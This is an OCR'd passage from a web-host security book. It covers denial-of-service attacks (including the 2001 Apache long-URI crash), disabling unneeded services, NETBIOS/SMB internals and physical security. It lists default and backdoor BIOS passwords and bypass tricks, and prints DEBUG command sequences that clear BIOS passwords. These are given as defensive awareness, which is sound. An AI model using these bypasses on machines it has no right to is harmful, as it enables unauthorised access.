material if you offer it. 
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Denial of Service 


A denial-of-service (DoS) attack is any action (initiated by a human or otherwise) that 
incapacitates your host’s hardware, software, or both, rendering your system 
unreachable and therefore denying service to legitimate (or even illegitimate) users. 


In a DoS attack, the attacker’s aim is straightforward: to knock your host(s) off the 
Net. Except when security teams test consenting hosts, DoS attacks are always mali- 
cious and unlawful. 


Denial of service is a persistent problem for two reasons. First, DoS attacks are quick, 
easy, and generate an immediate, noticeable result. Hence, they’re popular among 
budding crackers, or kids with extra time on their hands. As a Web administrator, 
you should expect frequent DoS attacks; they’re undoubtedly the most common 


type. 


But there’s still a more important reason why DoS attacks remain troublesome. Many 
such attacks exploit errors or inconsistencies in vendor TCP/IP implementations. 
Such errors exist until vendors correct them, and in the interim, affected hosts 
remain vulnerable. 


An example is the historical Teardrop attack. This attack involved sending 
malformed UDP packets to Windows target hosts. Targets would examine the 
malformed packet headers, choke on them, and generate a fatal exception. When 
Teardrop emerged, Microsoft quickly re-examined its TCP/IP stack, generated a fix, 
and posted updates. 


However, things aren’t always that easy, even when you have your operating 
system’s source code, as Linux users do. As new DoS attacks arise, you may find your- 
self taking varied actions depending on the situation (such as patching software, 
reconfiguring hardware, or filtering offending ports). 


Finally, DoS attacks are especially irritating because they can crop up in any service 
on your system. In a moment, we’ll examine a DoS attack that Apache sustained in 
2001. However, even though Apache has a good record in this area (not many DoS 
vulnerabilities), that’s no cause to rejoice. Your operating system may harbor weak- 
nesses, too, as can many of its services. So, even when you have a bug-free Apache 
distribution, this doesn’t offer any guarantee that you'll escape DoS attacks. 


An Apache-Based Denial-of-Service Example A serious Apache vulnerability 
surfaced on April 12, 2001, when Auriemma Luigi discovered (and William A. Rowe, 
Jr. confirmed) that attackers could send a custom URL via Web browser and thereby 
hang Apache, or run the target’s processor to 100% utilization. 


How Security Disasters Develop 45 


Attackers could perform this DoS attack in one of three ways: 
e Issue a GET request consisting of 8,184 / characters 
e Issue a HEAD request consisting of 8,182 A characters 


e Issue an ACCEPT of 8,182 / characters 


As Mr. Luigi explained, in both Windows 98 and Windows 2000, if an attacker sent 
two or more strings from different connections, the targets would crash (and all 
connections would thereafter fall idle). 


The problem affected all Apache versions earlier than version 1.3.20 on the following 
platforms: 


e Microsoft Win32 

e Microsoft Windows NT 

e Microsoft Windows 2000 
e OS/2 


As reported by the Apache team (http: //bugs.apache.org/index.cgi/full/7522): 


In the case of an extremely long URI, a deeply embedded parser properly discarded the 
request, returning the NULL pointer, and the next higher-level parser was not prepared for 
that contingency. Note further that accessing the NULL pointer created an exception caught 
by the OS, causing the apache process to be immediately terminated. While this exposes a 
denial-of-service attack, it does not pose an opportunity for any server exploits or data vulner- 
ability. 


Apache patched this problem in version 1.3.20. However, as I related earlier, Apache 
isn’t your only concern. You must be ever diligent to monitor security advisory lists 
for your operating system and any applications or modules that run on your Web 
host. 


Defacement or Total System Seizure 


Your security should never lapse so far that attackers could deface your site or seize 
control of your Web hosts. Yet, this happens at least 50 times a day, all over the 
world. I could enumerate a dozen reasons why, but they all trace back to two root 
problems: the failure to adequately plan initial Web host configuration, and the 
failure to keep systems patched and up-to-date. 
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First, securing your Web host really begins even before installation, when you make 
your first crucial decision: the decision of what type of host you're building. The 
most common types are as follows: 


e Intranet Web hosts—Hosts without Internet connectivity, typically connected 
to a Local Area Network 


e Private or extranet Web hosts—Hosts that have Internet connectivity but 
provide services only to a limited clientele 


e Public or sacrificial Web hosts—Garden-variety Web hosts that users known 
and unknown can access publicly, 24 hours a day, on the Internet 


Each type demands a different approach. On intranets, you may provide network 
services that you’d never allow on a public Web server (and these would pose infi- 
nitely less risk). Pages that interface with ActiveX are good examples. 


Default Linux or Windows/IIS installations include many services that your Web 
host can do without, including the following: 


e File Transfer Protocol 
e finger 
e Network File System 


e R services 


You must decide which services to provide by weighing their utility, their benefits, 
and the risks they pose. 


File Transfer Protocol 

File Transfer Protocol (FTP) is the standard method of transferring files from one 
system to another. In intranet and private Web hosts, you may well decide to 
provide FTP services as a convenient means of file distribution and acceptance. Or, 
you might provide FTP to offer users an alternate avenue though which to retrieve 
information that is otherwise available via HTTP. 


For public Web servers, though, you should pass on public FTP. If your organization 
needs to provide public FTP services, consider dedicating a box specifically for this 
purpose. This is especially true if your developers have onsite access to the system. 
Consider using Secure Shell instead, which ships with an easy-to-use, graphical file 
manager that allows host-to-host transfers via SCP. 
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finger 

fingerd (the finger server) reports personal information on specified users, includ- 
ing their username, real name, shell, directory, and office telephone number (if avail- 
able). This is primarily an issue for Unix-based servers. 


finger is nonessential, and exposes your system to intelligence gathering. Dan 
Farmer and Wietse Venema discussed the benefits finger offers to crackers in their 
paper Improving the Security of Your Site by Breaking into It 

(http: //www.mindrape.org/papers/improve_by_breakin.html): 


As every finger devotee knows, fingering “@”, “0”, and "", as well as common names, such 
as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. 
What that information is depends on the version of finger that your target is running, but 
the most notable are account names, along with their home directories and the host that they 


last logged in from. 


Crackers can use this information to track your staff’s movements, and even identify 
levels of trust within your organization and network. (At bare minimum, attackers 
can build user lists and establish other possible avenues of attack.) 


Network File System (NFS) 

Network File System (NFS) provides distributed file and directory access, and allows 
remote users to mount your file systems from afar. On the remote user’s machine, 
your exported file systems act and appear as though they’re local. NFS services there- 
fore vaguely resemble file and directory sharing on Windows and Mac OS. 


In internal networks, you might well use NFS for convenience. For example, using 
NFS, you can share out a central directory hierarchy located on a RAID (and contain- 
ing essential tools) to workstations system-wide. Or, you can use NFS to share out 
user home directories. This will ensure that users have access to their files even when 
they login to different machines. Hence, user bozo can login to 
linux1.samshack.net, linux2.samshack.net, or scounix.samshack.net and still 
have an identical /home directory. 


Note, however, that basing or placing critical services on NFS volumes is a dangerous 
practice on enterprise systems. Here’s why: Attackers need only knock out a single 
service (NFS) to down thousands of sites. For example, imagine if you RAID-out all 
your virtual domains to individual co-located boxes so that your customers can 
manage their files, but you still have central control. If attackers knock out your NFS, 
all your customers’ Web sites will experience outages until your engineers restart 
NFS. Try to avoid basing your enterprise on systems that have such a vulnerable 
single-point-of-failure. 
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If you do use NFS, though, take these steps: 


e Create separate partitions for file systems you intend to export, and enable the 
nosuid option on them. 


e Export file systems read-only unless otherwise necessary. 


e Limit portmapper access to trusted hosts. (Add portmapper and your approved 
host list to /etc/hosts.allow. After you’ve done that, add portmapper to 
/etc/hosts.deny and specify ALL). 


e Never export your root file system. 


e Your NFS server is configured by default to deny access to remote users logged 
in as root. Do not change this. 


Otherwise, unless you have to, don’t run NFS on systems that support public Web 
servers. The benefits outweigh the risk by a wide margin. 


The R Services 

The R services (rsh, rlogin, rwho, and rexec) provide varying degrees of command 
execution on, or interaction with, remote hosts, and are quite convenient in closed 
network environments. However, these have no place on a public Web server. Let’s 
briefly run through each one and what it does. 


rshd (The Remote Shell Server) rshd (the Remote Shell server) allows remote 
command execution. The client program (rsh) connects and requests a shell on the 
specified remote host. There, rshd opens the shell and executes user-supplied 
commands. rsh services are not suitable for publicly available Web servers. Don’t 
install rsh unless you really need it. 


rlogind (The Remote Login Server) rlogin is much like Telnet. In fact, once you 
log in using rlogin, things will work exactly as if you were using Telnet. The differ- 
ence is this: rlogin is designed to automate logins between machines that trust one 
another. In intranet environments or closed networks, providing rlogin services is 
fine, but they’re not essential on a public Web host. Don’t install rlogind unless you 
really need it. 


rexecd (The Remote Execution Server) rexec services are antiquated, but still avail- 
able on Linux and many Unix systems. rexec offers remote command execution, 
much like rsh. The chief difference is that users must supply a password to execute 
commands with rexec. However, even with this level of protection, I would still 
recommend disabling rexecd on public Web hosts. 


Other Services 


Next, we’ll cover additional services that might be running if you didn’t personally 
perform the installation, or if others had previously administered your Web host. 
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This is a common scenario. Your organization has been using a box for development 
for several months. Suddenly, you’re informed that the box should be converted to a 
Web or intranet host. Under these conditions, you should perform a re-installation. 
However, if you don’t, you may need to disable services that, although perfectly 
acceptable on a standalone or internal server, could pose security risks on a Web 
server. 


Things that likely don’t belong on your Web server include the following: 
e AOL Instant Messenger 
e CVS (use a separate box for that) 
e Gopher or other antiquated servers 
e ICQ 
e LDAP (unless you really need it) 
e Networked games (for example, Quake) 
e PCAnywhere, DoubleVision, or CloseUp 
e POP or IMAP servers 
e RealAudio or other sounds clients or servers 
e Unix talk 


e Yahoo! Messenger 


Table 2.3 addresses additional services and utilities that default installations some- 
times dump onto your drive, what they do, and suggestions on each one. 


TABLE 2.3 Other Network Services and Daemons 


Service Discussion 





amd amd is a tool for automatically mounting file systems and is often used in NFS- 
enabled environments. Hence, it’s a strong candidate, likely to appear on 
intranet hosts. If you’re migrating an intranet host to a public Web host, check 
for amd. If it’s running, ensure that it isn’t needed, and if not, disable it. 


bootparamd bootparamd is a tool for remotely booting Sun systems. It has no place on a 
public Web host, so if you find it running, disable it. 
dhcpd dhcpd is the Dynamic Host Configuration Protocol (DHCP) daemon. DHCP 


allows your system to relay vital network information to incoming clients. Users 
needn’t know their IP address, default gateway, or subnet masks before logging 
in because DHCP does it all for them. Public Web hosts have no need for DHCP. 
If you find that dhepd is running, disable it. 
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TABLE 2.3 


Continued 
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Service 


Discussion 





gopherd 


innd 


lpd 


portmap 


smbd 


ypbind 


ypserv 


Gopher is an antiquated (but effective) document distribution system from the 
University of Minnesota. Gopher was actually the Web’s predecessor and was in 
many ways similar. Originally accessible only via command-line interface, Gopher 
became the rage following the introduction of graphical Gopher clients. While 
it’s true that most mainstream Web clients also support Gopher, there are 
comparatively few instances in which you'd actually provide Gopher services. 
Some distributions turn Gopher on by default so be sure to check for it and 
disable it. 

innd is the Internet News daemon, a service not generally needed on public 
Web hosts. 

1pd is the line printer daemon, also a service not generally needed on public 
Web hosts (though often seen on intranet hosts). If you find 1pd running, 
disable it. 

portmap translates RPC program numbers into DARPA protocol port numbers, 
and is only needed if you’re providing RPC services like NFS, rusers, rwho, and 
so on (which, on a Web host, is inadvisable). 

smbd is the Samba server. It provides Server Message Block/LanManager-like 
services for Unix systems. This allows Unix boxes to serve as file servers in 
Microsoft-centric networks, and is therefore a common choice for intranet hosts. 
On a public Web host, disable smbd. 

ypbind allows client processes to bind or connect to NIS servers. Generally, you 
wouldn’t run NIS on a public Web server, so | recommend disabling it. 

ypserv serves local NIS information to remote hosts. Generally, you wouldn’t 
run NIS on a public Web server, so | recommend disabling it. 





If you don’t know what services your Web host is running, try scanning the system 
from port 0 to port 65000. This will reveal many (but not all) running services. 


TIP 


The bottom line is this: When you build your Web host, try the “minimal is better” philosophy 
by eliminating everything that isn’t necessary, including the X Window System, games, multi- 
media, demos, development example files, sample applications, additional shells, and so on. 





Windows -Specific Services 
Finally, Windows supports several services you should carefully consider: 


e NETBIOS 
e NETBEUI 
e SMB/CIFS 


How Security Disasters Develop 51 


NETBIOS NETBIOS emerged in 1984 as the support protocol for Sytek’s IBM PC 
Network adapter card. Microsoft subsequently created LAN software for IBM systems 
(MS-NET) and adopted the NETBIOS specification. With these heavy hitters behind 
it, NETBIOS rose to power as a dominant protocol and specification by which PC 
clients communicated with PC-based file and print servers. It gradually entrenched 
itself in various network implementations on Microsoft Disk Operating System, 
Windows, OS/2, and compliant systems, and in Token Ring, Ethernet, and ARCNET 
networks. 


Classic NETBIOS shared many characteristics with protocols discussed previously, 
and operated in two modes or rather, provided two transmission scenarios, reliable 
and unreliable, respectively. Each transmission method uses a distinct frame type. 


NETBIOS frames in reliable transmissions are I-type frames. A transmission of I-type 
frames vaguely resembles a persistent TCP connection, which offers guaranteed 
delivery. In such transmissions, the sending and receiving node both remain 
connected, and perform on-the-spot error checking by passing a sequence number 
for each data block. Such data blocks are typically 64KB or less, and when NETBIOS 
encounters larger chunks, it fragments these to meet this limitation. 


In contrast, NETBIOS also supports UI-type frames. Transmissions of Ul-type frames 
more closely resemble transfers using SOCK_DGRAM-type socket transmissions, where a 
persistent connection is not required. Here, the sending node hurls its frame into the 
vast network cosmos and neither expects nor receives delivery notification. Hence, 
Ul-frame transmissions are unreliable—no guarantee exists that the data will be or 
was received as intended. 


Developers working with NETBIOS must articulate NETBIOS commands within a 
framework called the Network Control Block (NCB) format. NCB structure looks like 
this: 


typedef struct NCB{ 


BYTE ncb_command; 
BYTE ncb_retcode; 
BYTE ncb_lsn; 
BYTE ncb_num; 


DWORD ncb_buffer; 
WORD ncb_length; 


BYTE ncb_callName[16]; 
BYTE ncb_name[16]; 
BYTE ncb_rto; 

BYTE ncb_sto; 

DWORD ncb_post; 

BYTE ncb_lana_num; 
BYTE ncb_cmd_cplt; 
BYTE ncb_reserved[14]; 


} NCB; 
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Table 2.4 defines 


each field. 


TABLE 2.4 Network Control Block Fields 





Field Significance 

bufadr 4-byte field that handles the message’s address 

buflen 2-byte field that stores the message’s buffer length 
callname 16-byte field that stores the computer name 

cmd_done 1-byte field that stores the command’s return code 
command 1-byte field that stores the command code 

lana_num 1-byte field that stores the NIC number 

lsn 1-byte field that stores the current session's number 

name 16-byte field that stores the local computer name 

num 1-byte field that stores the NETBIOS node’s name number 
post Address of user interrupt routine when a result is received 
res A reserved, 14-byte field 

retcode 1-byte field that stores the command's result 

rto 1-byte field that stores the receive time-out period 

sto 1-byte field that stores the send time-out period 


Table 2.5 lists NETBIOS commands and their significance. 


TABLE 2.5 NETBIOS Commands and Their Significance 


Command 


Significance 





ADAPTER STATUS 
ADD GROUP NAME 
ADD NAME 

CALL 

CANCEL 

CHAIN SEND 
DELETE NAME 

HANG UP 

LISTEN 

RECEIVE 

RECEIVE ANY 
RECEIVE BROADCAST 
RECEIVE DATAGRAM 
RESET 

SEND 

SEND BROADCAST 
SEND DATAGRAM 
SESSION STATUS 
UNLINK 


Get status of an adapter 

Add a group name to the table 
Add a name to the name table 
Establish a session with another node 
Cancel a command 

Send two buffers, concatenated 
Delete a name from the name table 
Close the current session 

Listen for a session request 

Receive session data from a peer 
Receive data from any session 
Receive the next broadcast 

Receive a datagram 

Reset NetBIOS 

Send data on the current session 
Send data to all nodes 

Send data, addressed by name 

Get the current session’s status 
Cancel boot redirection 
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Does NETBIOS have security significance? Absolutely. All protocols do. Periodically, 
NETBIOS-related security issues arise, and you’d do well to study NETBIOS. One 
example arose in August 2000. In Network Associates’ COVERT Labs Security 
Advisory COVERT-2000-10, NAI folks informed us that: 


The Microsoft Windows implementation of the NetBIOS cache allows a remote attacker to 
insert and flush dynamic cache entries as well as overwrite static entries through unsolicited 
unicast or broadcast UDP datagrams. As a result, remote attackers either on the local subnet 
or across the Internet may subvert the NetBIOS Name to IP address resolution process by redi- 


recting any NetBIOS Name to any arbitrary IP address under the control of the attacker. 


As a result: 


...dynamic NetBIOS cache entries can be inserted in addition to overwriting static entries 
imported from the LMHOSTS file. Furthermore, the NetBIOS cache is corrupted with an unso- 
licited UDP datagram, removing the requirement for attackers to predict Transaction IDs. With 
the NetBIOS cache under the control of a remote attacker many opportunities are available, 
one of the most obvious is to subvert outbound SMB connections to an arbitrary address. A 
rogue SMB server would then be able to capture NT username and password hashes as 
presented. 


Windows NT 4.0 and 2000 were vulnerable to such an attack. The answer was to 
filter out unauthorized connections to ports 135-139 and 445. (See 
http: //www.pgp.com/research/covert/advisories/045.asp.) 


NETBEUI NETBEUI (NetBIOS Extended User Interface) is a nonroutable protocol that 
provides communication between machines supporting the Network Driver Interface 
Specification (NDIS). IBM developed it for smaller local area networks (with, say, 
10-200 nodes), and did not intend it to independently implement global network- 
ing. (IBM engineers left that to routers and other protocols that do perform routing.) 
NETBEUI was therefore popular in Novell NetWare and Windows for Workgroups 
networks (or similar systems), where several workstations needed local connectivity 
and communication, but no more. 


SMB/CIFS SMB (Server Message Block Protocol) is a protocol that enables nodes to 
share printers, files, and named pipes. The SMB Protocol Extension specification 
emerged on November 29, 1989, but followed earlier specifications for the 
OpenNet/Microsoft Networks File Sharing Protocol. 


SMB was originally a collection of extensions to the LANMAN 1.0 Microsoft file 
sharing protocol. SMB, using NETBIOS over TCP/IP for transport, enables servers to 
serve clients with access to remote network resources and the capability to open, 
read, and write remote files, browse remote directories, and so forth. 
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At first an exclusively Microsoft/IBM technology, SMB has since crept into or 
inspired a variety of networking implementations on widely disparate operating 
systems. Some examples: 


e Digital PATHWORKS—PATHWORKS is a system that enables VAX hosts to func- 
tion as SMB servers, and thus interface smoothly with Windows, Macintosh, 
and OAS/2 client systems. Learn more at http: //kuhub.cc.ukans.edu/ 
www/html/721final/6558/6558pro_contents.html 


e SAMBA—SAMBA is an SMB server that enables Windows users (or in fact, 
anyone with a SMB client) to access Linux file systems. Learn more at 
http: //www.samba.org 


e Syntax’s TotalNET Advanced Server—This product integrates various operating 
systems. Learn more at http: //www.syntax.com/. 


e VisionFS from SCO—VisionFS allows PC systems to access Unix file servers 
transparently. Learn more at 
http: //www.sco.de/products/openserver/whitepaper/4.htm 


The original SMB specification called for the following message structure: 


BYTE smb_idf[4]; (contains OxFF,'SMB') 


BYTE smb_com; (command code) 

BYTE smb_rcls; (error class) 

BYTE smb_reh; (reserved for future) 
WORD smb_err; (error code) 

BYTE smb_flg; (flags) 


WORD smb_f1g2; (flags) 





WORD smb_res[6]; (reserved for future) 

WORD smb_tid; (authenticated resource identifier) 
WORD smb_pid; (caller's process id) 

WORD smb_uid; (authenticated user id) 

WORD smb_mid; (multiplex id) 

BYTE smb_wct; (count of 16-bit words that follow) 
WORD smb_vwv[]; (variable number of 16-bit words) 
WORD smb_bcc; (byte count) 

BYTE smb _buf[]; (variable number of bytes) 


Typical SMB commands and requests include the following: 
e CHECK PATH 
e CLOSE FILE 


e CLOSE PRINT FILE 
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e CREATE DIRECTORY 

e CREATE FILE 

e CREATE PRINT FILE 

e CREATE TEMPORARY FILE 
e DELETE DIRECTORY 

e DELETE FILE 

e FILE SEARCH 

e FLUSH FILE 

e GET FILE ATTRIBUTES 
e GET SERVER ATTRIBUTES 
e LOCK RECORD 

e MAKE NEW FILE 

e NEGOTIATE PROTOCOL 
e OPEN FILE 

e PROCESS EXIT 

e READ 

e RENAME FILE 

e SEEK 

e SET FILE ATTRIBUTES 
e TREE CONNECT 

e TREE DISCONNECT 

e UNLOCK RECORD 

e WRITE 


e WRITE PRINT FILE 


As you can quickly see from the preceding command list, SMB is different from other 
protocols. Most of the protocols discussed in this chapter don’t actually operate 
directly on data per se, nor do they allow others to do so (or at least, not via a 
simple, one-call request). Instead, they merely transport it. SMB, on the other hand, 
offers a client interesting possibilities, and any security hole in SMB could immedi- 
ately threaten a wide variety of resources on the target. 
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Has SMB ever been proven vulnerable to attack? Absolutely. Some examples: 


e In May 2000, independent researchers showed that SMB was vulnerable to elec- 
tronic eavesdropping. Learn more at 
http://www. securityfocus.com/templates/archive.pike?list= 
100&mid=76082. 


e LOphtCrack, a popular password cracking utility, is capable of capturing SMB 
packets, and thus capturing passwords. Learn more at http//www. 10pht.com. 


e In April 1997, Paul Ashton demonstrated that one could alter a SMB client to 
spoof a legitimate user, and thus gain unauthorized access to the targeted 
server's file system. To learn more, go to 
http://www. securityfocus.com/vdb/bottom.html?vid=233&_ref=1683130491. 


In fact, SMB vulnerabilities crop up periodically, but this happens no more 
frequently than it does with other protocols. The latest emerged in June 2000. 
Researchers found that an improperly DCE/RPC request wrapped in an SMB write 
request would crash Windows NT 4.0 and Windows 2000 machines, causing a 
denial-of-service condition. However, these issues aren’t critical. 


The most advanced and recent SMB implementation is the Common Internet File 
System (CIFS). 


NOTE 
To obtain early CIFS specifications and documentation, visit Microsoft’s CIFS FTP site. The 
material there is definitely dated, but arguably provides some of the most complete CIFS 
documentation. Find it at ftp://ftp.microsoft.com/developr/drg/CIFS/. 








Summary 


This chapter highlighted what risks you'll face. Your best defense against these risks 
is to carefully plan your Web host before you release it into the general population, 
and thereafter keep your patches current. The next chapter will focus on doing 
precisely that: implementing baseline security procedures when you first establish 
your Web host. 
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your host, generally. In this short chapter, we’ll race 
through the following issues: 


e Physical security concepts 

e Server location and access 

e Network topology 

e BIOS and console passwords 
e Media and boot security 

e Biometric access controls 


e Anti-theft devices 


Physical Security Concepts 


Your Apache system will face many threats, but of these, 
physical threats loom largest. This is because when 
someone has physical access, they can damage portions of 
your system and information infrastructure that remote 
attackers cannot reach. 


The usual suspects: 
e Malicious local users 
e Disgruntled employees 


e Vandals or thieves 
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When administrators contemplate physical security, they typically think in purely 
catastrophic terms, mulling accidents, disasters, and theft. This is sensible, because 
all three are legitimate threats. However, catastrophes are worst-case scenarios from 
which a system cannot recover. Many less-than-catastrophic physical security 
breaches pose dangers not so obvious, and new administrators often overlook them. 


Indeed, many physical security breaches leave no evidence trail. To appreciate this, 
think now of the machines you use in the normal course of business. These are 
likely located in your office or home. Each day, you boot these machines or login 
assuming that in your absence, they sat quiet and undisturbed. What if they didn’t? 


What if, while you grabbed lunch, someone logged in and perused your files? Would 
you know it? This unpleasant scenario provokes suspicion, and rightly so. You, like 
most users, no doubt store sensitive data on your system. You’d hardly want others 
rifling through it. Let’s run through a few pointers on how to prevent this. 


Server Location and Physical Access 


The two cardinal points are where your server is housed, and who has physical access 
to it. Security specialists have long held that if malicious users have physical access, 
security controls are pointless. Is this true? Absolutely. Nearly all computer systems 
are vulnerable to onsite attack. 


Attack in this sense can mean many things. For example, what if you gave a mali- 
cious user ten seconds alone with your servers? Could he, within that timeframe, do 
anything substantial? Certainly. He could perform brutish denial-of-service attacks 
merely by disconnecting wires, unplugging network hardware, or rebooting your 
servers. 


But these acts are rare in office settings. Instead, concern yourself chiefly with autho- 
rized local users. Experts estimate that insiders initiate 65%-80% of all serious intru- 
sions, and with good reason: Insiders often possess information and physical access 
that outsiders do not. 


But that’s not the only advantage insiders have. Trust is another. In many compa- 
nies, trusted employees roam freely, without fear of interrogation. After all, they’re 
supposed to be onsite. So, how do you protect your system from the enemy within? 
Government agencies and Internet service providers favor establishing a network 
operations center (NOC), and enforcing strict policies on who can access it. 


A network operations center is a restricted area that houses your servers. Here, you 
typically bolt your servers down, fasten them to racks, or otherwise secure them, 
along with other essential hardware. 


Ideally, few people should have access to your NOC. Those who do should have 
keys. One method is to use card keys that restrict even authorized users to certain 
times of day. Finally, consider keeping a log of when personnel enter and leave. 
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Also, establish your NOC with these points in mind: 


e Nest it inside other office space, away from the public, preferably not on the 
ground floor. 


e Passageways leading to it should be solid—no glass doors. 


e Doors should have metal shielding, from the lock casing to the surrounding 
frame. This stops intruders from tampering with the lock’s sliding bolt. 


e Consider closed-circuit TV. 


Network Topology 


Network topology refers to your network’s layout, or how you link its components 
together. Network topology determines hardware links and how data flows across 
them, and thus has security implications. 


When choosing a topology, consider these risks: 


e The single point of failure—A central point (a hub, wire, router, switch) on which 
one or more network devices rely. When this central point fails, the system can 
lose network connectivity, and your site will be down. Every network has one 
single point of failure, and some have more than one. Your aim is to minimize 
the damage a network outage can cause, and different topologies pose different 
limitations in this regard. 


e Susceptibility to electronic eavesdropping—Electronic eavesdropping is where 
attackers surreptitiously capture network traffic. All topologies are vulnerable, 
but some topologies offer greater security than others. 


e Fault tolerance—In this context, this is your network’s capability to survive 
isolated failures. That is, if one, two, or five workstations fail, will remaining 
workstations continue to operate? If your network is fault tolerant, the answer 
is yes. 


Unless you have reasons not to, choose star topology, and implement it with hubs, 
switches, or routers that support encryption, access passwords, and administrative 
authentication. Also, run your wire through the walls, instead of exposing it where 
others can physically access it. Finally, reduce your Web system’s complexity when- 
ever possible. 


NOTE 





For a good, quick primer on what various topologies look like, go to 
http: //fcit.coedu.usf.edu/network/chap5/chap5.htm. 
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For example, don’t distribute functions on a machine-by-machine basis unless you 
must. You’ve probably seen this before: one machine stores images, another stores 
CGI, another stores bare content, denial-of-service isn’t necessary to discourage visi- 
tors—partial denial-of-service can, too. 


Suppose that your developers build dynamic pages with media and logic housed on 
many different machines. What happens if one of those machines dies? You’ve seen 
this when a page never paints because it’s waiting for images from other servers, or 
it’s trying to send a transactional log elsewhere, to another network. Users have no 
patience, and if your site offers commerce services, these failures can cost you dearly. 
Systems parted out in the aforementioned manner are more likely to become 
partially disabled by malicious actors. 


BIOS and Console Passwords 


Nearly all computers today support BIOS passwords, console passwords, or both. 
BIOS passwords bar malicious users from accessing system setups, while console pass- 
words protect workstation single-user modes. Either way, such password systems are 
at least marginally effective, and you should use them. 


Be sure to use a unique password; that is, one that’s different from other passwords 
you’ve used on the network. This ensures that even if attackers later crack your BIOS 
password, they can’t use it to crack other hosts, applications, or networks. 


How secure are BIOS passwords? Not very. They mainly foil newbie attackers. Today, 
most crackers know default and backdoor BIOS setup keys and passwords for most 
makes and models. Table 3.1 lists a few. 


TABLE 3.1. Well-Known BIOS Entry Keys and Passwords 


Manufacturer Entry Key and/or Default Passwords 








American Megatrends A.M.I.,, alfarome, AMI, ami, AMI SW, AMI!SW, AMI?SW, AMI_SW, AMIDE - 
CODE, bios, BIOS, cmos, efmuk1, EWITT RAND, HEWITT RAND, Oder, 
PASSWORD, and setup. 

Award award, 01322222, 589589, 589589, 589721, aLLy, aPAf, AW, Award, 
AWARD, AWARD PW, AWARD SW, Award SW, AWARD HW, AWARD PS, AWARD PW, 
AWARD_ SW, awkward, CONCAT, djonet, LTHLT, j256, J262, j262, 322, 
J64, KDD, SER, SKY_FOX, Syxz, TTPTHA, ZAAADA, ZBAAACA, and ZJAAADC. 

Generic entry keys Generic entry key combinations include ALT+?, ALT+S, ALT+ENTER, F1, 
F2, F3, CTRL+F1, CTRL+F3, CTRL+SHIFT+ESC, DEL, CTRL+ALT+INS, 
CTRL+ALT+S, ESC, and INS. 

Generic passwords Generic default passwords (on various models) include admin, 
ALFAROME, BIOS, BIOSSTAR, biosstar, BIOSTAR, biostar, CMOS, CONDO, 
J64, PASS, PASSOFF, SETUP, and system. 
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TABLE 3.1. Continued 


Manufacturer Entry Key and/or Default Passwords 





IBM Aptiva Attackers can bypass the BIOS password by repeatedly depressing both 
mouse buttons on boot. 

Toshiba Some models enable operators to bypass BIOS password protection by 
holding down the Shift button. 





Additionally, various prefabricated tools exist that either ferret out your BIOS pass- 
word or “blast” it. (Blasting is where the attacker forces the password out of BIOS 
memory.) True, attackers must have these tools on hand when they crack your BIOS 
password (and few carry such tools in their back pocket). However, if Internet access 
is available, they can download such tools in seconds. 


Hence, you can’t rely on BIOS passwords as a serious line of defense. At best, they 
keep out casual users and give more experienced users pause—if only because it takes 
time to disable one. For machines located in well-lit, frequented areas, BIOS pass- 
words are like shatter-resistant glass panes. True, an intruder can break them, but 
he’ll attract unwanted attention in the bargain. 


Note, however, that BIOS passwords will not defeat a determined attacker who has 
sufficient time alone. Machines already booted, or those unattended and solely 
protected by BIOS passwords, are vulnerable to several types of attacks. 


From a software standpoint, an attacker can disable BIOS passwords on any Windows 
machine that supports the DEBUG command. For example, suppose an attacker passed 
your machine now and saw Windows running. He could crank up DEBUG and try 
these commands: 


0 70 2E 
0 71 FF 
Q 


or these: 


0 70 17 
0 71 17 
Q 


or these: 


0 70 FF 
0 71 17 
Q 
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These command strings send various byte values to ports 70 and 71, and clear BIOS 
passwords on most IBM compatibles. This is functionally equivalent to disabling the 
CMOS battery (another common physical attack), or switching BIOS jumper settings. 
Most motherboards, as a failsafe measure, have a jumper setting that voids the 
current BIOS password. This way, if you forget the password (or if someone changes 
it to an unknown value), you can still recover. 


Finally, most BIOS password algorithms have now been disclosed, making it easy to 
create a BIOS password cracker. For specific algorithms (and recipes for making such 
a tool), visit Eleventh Alliances BIOS password algorithm page, located at 

http: //mirror.11a.nu/bios3.htm. 


CAUTION 


Reconsider setting BIOS and PROM passwords on servers that you later intend to 
remotely reboot. If these passwords are set and the machine reboots, it will hang at the 
password prompt, waiting for an answer. If the server provides critical servers, this could 
have you hopping out of bed in the wee hours. 





Media and Boot Security 


Other seldom-addressed issues are boot media and drive accessibility. In settings that 
expose your machines to public use or access—such as in a university computer 
lab—you should disable floppy or CD-ROM boot access. Typically, you do this 
through system BIOS settings. 


In older systems, this isn’t an issue. In fact, it’s only in recent years that PC-based 
CD-ROM drive manufacturers have incorporated exotic boot options. (Workstation- 
based SCSI systems have been bootable for much longer). Also, it was only recently 
that the majority of BIOS chips supported user-defined boot options. 


The reason for disabling boot options is this: If you don’t, anyone walking by can 
insert a boot disk or installation media and overwrite your drive, install software, or 
perhaps copy or read files on unprotected, non-NTFS, or poorly controlled Unix 
partitions. (Note also that if certain conditions are met, certain boot disks, if properly 
configured, can bypass some or all of your security measures.) 


How you disable these boot options varies. In some cases, the BIOS supports an 
implicit restriction, offering a Disable Floppy Boot or a Disable CD-ROM Boot 
feature, or both. In other cases, you must force a prohibition by specifying a particu- 
lar boot sequence. 


The term boot sequence refers to what drives the system should search to find the 
bootable partition. Today, it’s common for BIOS chips to offer widely diverse boot 
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sequence options, such as A, C, IDEQ@1, IDE@2, CDROM, OTHER, ALL, and so on. Many 
offer preset combinations, such as the following: 


e A, C, CDROM 
ec 

e CA 

e CDROM, C, A 


e IDEQ1, IDEQ2, CDROM, C 


In situations where your BIOS does not offer an implicit restriction, choose C only (if 
that option is available). This forces the system to boot exclusively from the C drive. 
(In cases where the preset combinations permit you to exclude the CD-ROM, but 
force drive A in their sequences, toggle the Disable Floppy Seek on Boot option.) 


If you’re using SCSI drives, however, disabling boot features is more complicated. 
Here, you must review your SCSI adapter’s documentation. Only in rare cases can 
you control SCSI device boot control from the system BIOS. (Exceptions include situ- 
ations where your SCSI is on-board, as in ASUS boards that have two—and some- 
times four—SCSI connectors permanently installed on the motherboard.) 


Most SCSI adapters have their own BIOS, which permits you to set which drives are 
bootable. If you establish such settings, ensure that you either set the SCSI adapter’s 
administrative password (if it has one), or otherwise set your BIOS password. Stand- 
alone SCSI adapters kick in after the BIOS finishes its hardware diagnostic routines. 


Biometric Identification: A Historical Perspective 


Biometric identification is a new field, but its roots reach to ancient Egypt, when 
Pharaohs “signed” decrees with their thumbprint. In more recent times, Sir Francis 
